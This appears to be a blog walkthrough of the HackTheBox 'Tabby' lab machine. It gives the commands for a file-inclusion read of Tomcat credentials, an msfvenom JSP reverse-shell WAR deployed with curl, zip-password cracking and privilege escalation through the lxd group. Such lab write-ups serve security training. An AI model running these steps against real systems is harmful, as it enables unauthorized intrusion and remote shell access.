Hey folks, Here we come back again to continue HackTheBox machines series with “Tabby” machine, before we get started let’s take a look at machines info
As you can see it’s easy but in my opinion it should be medium because it has in every step something new and seems to be hard for beginners, whatever let’s get started…
We will work on it without
Metasploit
As usual, we will begin our walkthrough with nmap
scan to get all open ports and service running on them, let’s perform standard scan
nmap -A -T4 10.10.10.194PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
we have 22/80/8080
are open and services apache 2.4.41 / openssh 8.2p1 /apache tomcat
so what we will do ?
- Try to search for exploits in
apache 2.4.41
by usingsearchsploit
tool - Try to brute-force
ssh
credentials by usingnmap scripts
andbrutespray
tool - Try to brute-force
tomcat
credentials by usingmetasploit
andnmap scirpts
- Try to enumerate website at
10.10.10.194:80
and10.10.10.194:8080
and content discovery by usingdirbuster/dirsearch/ffuf/gobuster
Let’s start…
1. Public exploitation
I’ve searched for public exploitation in exploit-db
and rapid-7
and public websites for exploitation for apache 2.4.41 / openssh 8.2p1
but unfortunately nothing we found
For Tomcat
we found exploitation at rapid-7
and exploit-db
but we must know tomcat credentials and the manager path, so we will need it later not now
2. SSH Credentials
I’ve brute forced ssh credentials by using nmap
and brutespray
but nothing useful!!
3. Tomcat login credentials brute force
I’ve brute force the credentials but also nothing useful, we used metasploit
Check the method at Metasploit
4. Website Enumeration and content discovery
At first I will open 10.10.10.194:80
Nice, we have website seems like more websites in real life, and it seems like hosting websites so let’s discover it and check its source code
While checking the source code we found this link megahosting.htb/news.php?file=statement
so we need to add this domain megahosting
to the /etc/hosts
by adding it like this line to the /etc/hosts
file
10.10.10.194 megahosting
and then we will access the upper link
let’s search for megahosting exploit
at google, it may be affected by custom exploitation.
We have found this one
But until now we don’t know our version so let’s try this exploit in the upper link megahosting.htb/news.php?file=statement
Good, it’s vulnerable also.
Let’s try to get any information form tomcat
directories, it may have sensitive information
After some enumeration I’ve found a bunch of directories in these links
and also search for the tomcat-users.xml
location file and found it into them so let’s try to open all of them by using burp intruder or anything else
/var/share/tomcat9/etc/tomcat-users.xml
is available and has credentials for the admin-gui and manager-script
so let’s take these credentials and try to upload a reverse payload
Note: one of the privileges of admin-gui and manager-script
is to deploy files on the server, so we will create a reverse payload and then deploy it
reverse shell payload → msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.wardeploy your payload → curl --upload-file <path/to/shell.war> "http://megahosting:8080/manager/deploy/text?path=/shell&update=true"
and then you can access it by open nc <port-number>
and access the webpage megahosting:8080/shell
So for now we’re into the server but not in the user role so let’s discover our privileges by opening the uses directories
We can’t open the user directory, so let’s try to get more privileges by searching for any important directories or files
After some enumeration I’ve found this backup file in /var/www/html/files
So I will try to download it in the local machine and look at it’s content
We will transfer it by opening a server on the vulnerable machine and access it from the attack machine
Vulnerable machine > python3 -m http.server 80
Attack machine > wget http://10.10.10.194:80/backup-file-name
Now we have it on our attack machine, let’s try to unzip
it by unzip file-name
It’s protected by a password, so you can use hashcat or john the wripper
to crack the password, I’ll use fcrackzip
because it doesn’t take much time
And we have the password admin@it
After trying to unzip the file I have found nothing useful inside it so let’s use the password in other way
Let’s try to use it to login as ash
user → su ash
and insert this password
Good we have more privileges now but not the user privileges so let’s grab the user.txt
first
Good, for now let’s try to find anything led us to the root access.
If you noticed the ash
user is in lxd
group
So after some google searching about how to use this role to be root user, I’ve found awesome resource to do it
Before we follow this resource let’s get first interactive shell because it will not work on the normal shell
python -c 'import pty; pty.spawn("/bin/bash")'
It will get you in the interactive shell to be manage to access lxd
then do as this man do exactly
As you will find in the upper link I’ve downloaded the tar
file and transfer it to the vulnerable machine as you can see
After that I compiled it on the victim machine and create an image
The final step is to access the image which we create
Let’s get our root.txt
from the root directory
There’s nothing in this directory
It seems that he’s kidding me :)
Let’s search for the flag in all directories
After some search I’ve found ❤